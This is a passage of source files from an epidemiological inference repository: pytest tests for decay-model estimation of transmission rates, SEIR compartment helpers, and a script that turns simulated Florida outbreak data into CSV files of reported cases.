"src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nfrom epi_inference.formulations.decay_lsq import run_decay_lsq\nfrom epi_inference.formulations.decay_blike import run_decay_blike\n#from epi_inference.formulations.multinode_decay_lsq import run_multinode_decay_lsq\n#import matplotlib.pyplot as plt\n\n# Todo: Add tests for other formulations\n\ndef test_decay_lsq_standard():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_analysis_window():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 
'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho_assumed,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n results = run_decay_lsq(cm_rep_cases=zeroC,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'stale'\n assert results['msg'] == 'Transmission parameter beta not solved (stale).'\n\ndef test_decay_blike_standard():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_analysis_window():\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n 
tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_blike(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho,\n Cdates=Cdates\n )\n \n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho_assumed,\n Cdates=Cdates\n )\n\n # Note, we expect errors here since the models are not the same\n assert beta == pytest.approx(results['est_beta'], 1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_blike_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n results = run_decay_blike(cm_rep_cases=zeroC,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'failed'\n assert results['msg'] == 'Transmission parameter beta not solved (stale) in least-squares initialization.'\n\ndef test_multinode_decay_lsq_standard():\n \"\"\"\n Test the multinode decay inference using data from a simulation with 
the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # here, all three columns are the same, so we would expect beta to match\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\n@pytest.mark.skip('analysis_window not yet implemented for multinode decay')\ndef test_multinode_decay_analysis_window():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_multinode_decay_lsq_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef 
test_multinode_decay_lsq_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(C), '1': list(C), '3': list(C)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=2,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_multinode_decay_lsq_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(zeroC), '1': list(zeroC), '3': list(zeroC)})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'failed'\n assert results['msg'] == 'Transmission parameter beta not solved (stale).'\n\ndef test_multinode_decay_lsq_diff_beta():\n # test with different beta values for each column\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n cm_rep_cases = list()\n for beta in [0.5, 0.75, 1.0]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n cm_rep_cases.append(C)\n\n # create a dataframe with the column of cases\n df_cm_rep_cases = pd.DataFrame({'0': list(cm_rep_cases[0]), '1': list(cm_rep_cases[1]), '3': list(cm_rep_cases[2])})\n df_populations = pd.DataFrame({'county': ['0', '1', '2'], 'population':[N, N, N]})\n df_populations = df_populations.set_index('county')\n results = run_multinode_decay_lsq(\n cm_rep_cases=df_cm_rep_cases,\n populations=df_populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n # this is the result we obtain - beta seems weighted to the column with the most cases\n assert 0.888 == 
pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n" }, { "alpha_fraction": 0.8290196061134338, "alphanum_fraction": 0.8313725590705872, "avg_line_length": 66.10526275634766, "blob_id": "9289fdc488f25cbb6939a7a94b7c1ffde4f02672", "content_id": "f987d788efe2bd5fa9f8ddc97d7d03d4c208af0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 108, "num_lines": 19, "path": "/epi_inference/formulations/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#from .multinode_decay_lsq import run_multinode_decay_lsq\nfrom .multinode_mobility_decay_lsq import run_multinode_mobility_decay_lsq\nfrom .multinode_mobility_window_decay_lsq import run_multinode_mobility_window_decay_lsq\nfrom .multinode_mobility_window_decay_lsq_poek import run_multinode_mobility_window_decay_lsq_poek\nfrom .multinode_mobility_window_decay_lsq_old import run_multinode_mobility_window_decay_lsq_old\nfrom .multinode_mobility_window_decay_lsq_iterative import run_multinode_mobility_window_decay_lsq_iterative\n#from .multinode_mobility_time_varying_decay_lsq import run_multinode_mobility_time_varying_decay_lsq\n#from .multinode_decay_multibeta_lsq import run_multinode_decay_multibeta_lsq\nfrom .decay_lsq import run_decay_lsq\n#from .decay_multibeta_lsq import run_decay_multibeta_lsq\nfrom .decay_blike import run_decay_blike\n#from .multibeta_singleomega_decay_lsq import run_multibeta_singleomega_decay_lsq\n#from .multibeta_singleomegawin_decay_lsq import run_multibeta_singleomegawin_decay_lsq\n#from .multibeta_singleomegawin_decay_l1 import run_multibeta_singleomegawin_decay_l1\n#from .multibeta_multiwin_decay_lsq import run_multibeta_multiwin_decay_lsq\n\nfrom . import inference_json2csv_wf\nfrom . import inference_mobility_windows_wf\nfrom . 
import util\n" }, { "alpha_fraction": 0.38509318232536316, "alphanum_fraction": 0.7577639818191528, "avg_line_length": 22, "blob_id": "b24f37d5833d9b920afb3913672ab98803f15011", "content_id": "c00447d0508a9e6748372de04c576412246fa68e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp3/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.6388888888888888\nR0 = 2.5555555555555554\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 12, "blob_id": "8985c2b6a59d2bcb9f989b7ed6f60b88cf8b30f2", "content_id": "c66304a1961f1ec7352fb4e51535ce75e4302f23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 39, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/examples/README.txt", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# This directory contains examples\n#\n" }, { "alpha_fraction": 0.5374841094017029, "alphanum_fraction": 0.5481938719749451, "avg_line_length": 44.83333206176758, "blob_id": "e7aefa9d3594da134bb93c1c299c9b76f3c26ce3", "content_id": "995be5a37b66285d6d3aa6ff5be89a6e209bf43b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5509, "license_type": "no_license", "max_line_length": 125, "num_lines": 120, "path": "/epi_inference/evaluation/simulated-data/bin/create-simulated-data-from-pipeline-parquet-files.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import sys\nimport pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport csv\nfrom os import listdir, makedirs\nfrom os.path import isfile, join, splitext, exists\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfor shortlong in ['short', 'long']:\n output_path = './data/florida-{}/'.format(shortlong)\n if not exists(output_path):\n makedirs(output_path)\n for strR0 in ['2.25']: #['1.25', '1.50', '1.75', '2.00', '2.25', '2.50', '2.75', '3.00']:\n path = '../pipeline_simulation/florida/model_output/florida-R0-{}-{}_None'.format(strR0, shortlong)\n\n # get the list of all the parquet files (one for each realization)\n files = list()\n for f in listdir(path):\n if isfile(join(path, f)):\n filename, extension = splitext(f)\n if extension == '.parquet':\n files.append(filename)\n\n # read the parquet files and output the data in csv\n d = dict()\n counties = None\n dates = None\n # loop over all realizations\n for i,f in enumerate(files):\n print('processing realization ... 
', i)\n parquet_file = join(path, '{}.parquet'.format(f))\n df = pd.read_parquet(parquet_file, engine='pyarrow')\n\n # write out the original file\n fname = join(output_path, 'FL_{}_realization_{}_original_parquet.csv'.format(strR0, i))\n df.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n # adjust the names of the columns to align with ours\n # change time to Date\n # change the FIPS codes from float to string\n rename_dict = {'time': 'Date'}\n for c in df.columns:\n if c.endswith('.0'):\n rename_dict[c] = c[:-2]\n df = df.rename(columns=rename_dict)\n # change the order so Date is first\n reorder = ['Date']\n for c in df.columns:\n if c != 'Date':\n reorder.append(c)\n df = df.reindex(columns=reorder)\n\n # write the SEIIIR output\n fname = join(output_path, 'FL_SEIIIR_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n df.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n # build a dataframe of their cumulative reported cases\n dfcmI = df[df['comp'] == 'cumI'].copy()\n del dfcmI['comp']\n\n # shift all the cases by 3 days (they count cumI at ~5 days and we want a total of 8 days)\n mask = ~(dfcmI.columns.isin(['Date']))\n cols_to_shift = dfcmI.columns[mask]\n dfcmI[cols_to_shift] = dfcmI[cols_to_shift].shift(+3, fill_value=0.0).copy()\n # let's apply a reporting factor of 1/10 and then round\n dfcmI = dfcmI.set_index('Date')\n dfcmI = dfcmI.multiply(0.1)\n dfcmI = dfcmI.round()\n dfcmI = dfcmI.reset_index()\n fname = join(output_path, 'FL_cumulative_I_shifted_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n dfcmI.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n ###\n # build a dataframe of cumulative reported cases using stochastic\n # process parameters from Derek - get the transmissions from the\n # simulated values in the S compartment\n dftx = df[df['comp'] == 'S']\n del dftx['comp']\n dftx = dftx.set_index('Date')\n dftx = dftx.diff()\n dftx.iloc[0] = 0\n dftx = dftx.abs().astype(int)\n # dftx is now the transmissions with the date that they occured\n # for each of these transmissions, let's find out when they are reported\n dfrepcases = pd.DataFrame({'Date': dftx.index})\n for c in dftx.columns:\n dftxc = dftx[c]\n dftxcv = dftxc.values\n repcases = np.zeros(dftxc.values.shape)\n\n for d in range(len(dftxc)):\n # total number of transmissions on index day d\n n_tx = dftxcv[d]\n # compute the number that are reported\n reporting_probability = 0.1\n n_reported_tx = np.random.binomial(n_tx, reporting_probability)\n\n # compute when they are reported\n delays_days = np.random.lognormal(mean=np.log(8), sigma=np.log(1.35), size=n_reported_tx)\n assert type(delays_days) is np.ndarray\n delays_days = np.round(delays_days).astype(int)\n for delay in delays_days:\n if d+delay < len(repcases):\n repcases[d+delay] += 1\n\n dfrepcases[c] = repcases\n\n # for d in range(len(dftxc)):\n # print(dftxcv[d], repcases[d])\n # print(sum(dftxcv), sum(repcases))\n # quit()\n\n dfrepcases = dfrepcases.set_index('Date')\n dfcmI = dfcmI.set_index('Date')\n dfcmrepcases = dfrepcases.cumsum()\n dfcmrepcases = dfcmrepcases.reset_index()\n fname = join(output_path, 'FL_cumulative_reported_cases_R0_{}_{}_realization_{}.csv'.format(strR0, shortlong, i))\n dfcmrepcases.to_csv(fname, index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n \n" }, { "alpha_fraction": 0.5699300765991211, "alphanum_fraction": 0.5999001264572144, "avg_line_length": 39.85714340209961, 
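A condensed, standalone restatement of the reporting model used in the script above (the reporting probability and delay parameters are copied from it; the helper name is illustrative): each transmission is reported with probability 0.1 and, if reported, appears after a lognormally distributed delay with a median of 8 days.

import numpy as np

def reported_cases_from_transmissions(transmissions, reporting_probability=0.1, seed=0):
    rng = np.random.default_rng(seed)
    reported = np.zeros(len(transmissions))
    for day, n_tx in enumerate(transmissions):
        n_rep = rng.binomial(int(n_tx), reporting_probability)
        delays = np.round(rng.lognormal(mean=np.log(8), sigma=np.log(1.35), size=n_rep)).astype(int)
        for d in delays:
            if day + d < len(reported):      # reports falling past the horizon are dropped
                reported[day + d] += 1
    return reported

print(reported_cases_from_transmissions([0, 0, 100, 250, 400, 300, 150, 50, 0, 0]))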
"blob_id": "cbfa306d1edab826bc7c8df32df1ca81e1ae6371", "content_id": "6dcfa7c561864afa7ef2016eeb317f5313d6e387", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2002, "license_type": "no_license", "max_line_length": 138, "num_lines": 49, "path": "/epi_inference/tseir_utils.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pyomo.environ as pe\nimport pyomo.dae as dae\nimport math\n\ndef reported_cases_from_cumulative(cumulative_reported_cases):\n cumul_rep_cases = [0] + cumulative_reported_cases\n reported_cases = [cumul_rep_cases[i] - cumul_rep_cases[i-1] for i in range(1,len(cumul_rep_cases))]\n return reported_cases\n\ndef compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor): # pragma: no cover\n print(\"WARNING - THIS CODE IS NOT TESTED\")\n reported_cases = reported_cases_from_cumulative(cumulative_reported_cases)\n cases = [reporting_factor*c for c in reported_cases]\n\n S = [None]*len(cases)\n S[0] = population\n E = [0]*len(cases)\n I = [0]*len(cases)\n R = [0]*len(cases)\n for t in range(len(cases)):\n if t+1 < len(cases):\n S[t+1] = S[t] - cases[t]\n if t - deltaE - deltaI >= 0:\n R[t+1] = R[t] + cases[t-deltaE-deltaI]\n E[t] = sum(cases[t-tau] for tau in range(1,deltaE+1) if t-tau >= 0)\n I[t] = sum(cases[t-deltaE-tau] for tau in range(1,deltaI+1) if t-deltaE-tau >= 0)\n return cases, S, E, I, R\n\ndef compute_compartments_decay(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor):\n reported_cases = reported_cases_from_cumulative(cumulative_reported_cases)\n cases = [reporting_factor*c for c in reported_cases]\n\n S = [None]*len(cases)\n S[0] = population\n E = [0]*len(cases)\n I1 = [0]*len(cases)\n I2 = [0]*len(cases)\n I3 = [0]*len(cases)\n R = [0]*len(cases)\n for t in range(len(cases)-1):\n S[t+1] = S[t] - cases[t]\n E[t+1] = E[t] + cases[t] - sigma*E[t]\n I1[t+1] = I1[t] + sigma*E[t] - gamma_1*I1[t]\n I2[t+1] = I2[t] + gamma_1*I1[t] - gamma_2*I2[t]\n I3[t+1] = I3[t] + gamma_2*I2[t] - gamma_3*I3[t]\n R[t+1] = R[t] + gamma_3*I3[t]\n #I = [I1[t] + I2[t] + I3[t] for t in len(cases)]\n return cases, S, E, I1, I2, I3, R\n" }, { "alpha_fraction": 0.5377113223075867, "alphanum_fraction": 0.5774660706520081, "avg_line_length": 33.59807205200195, "blob_id": "33108e948de18ff840da49d418c0df3eec138b2f", "content_id": "0d8097d3ff9ce4d77918bcf5d864fc5304fa2def", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10766, "license_type": "no_license", "max_line_length": 132, "num_lines": 311, "path": "/epi_inference/simulation/simulation.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\"\"\"\nThis module contains some simple simulation models for testing the \ninference methods\n\"\"\"\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom pyutilib.misc.misc import Bunch\n\n# the '*' forces the caller to use named keyword arguments\ndef simulate_continuous_seiiir_deterministic(*, y0, tf, beta, sigma, 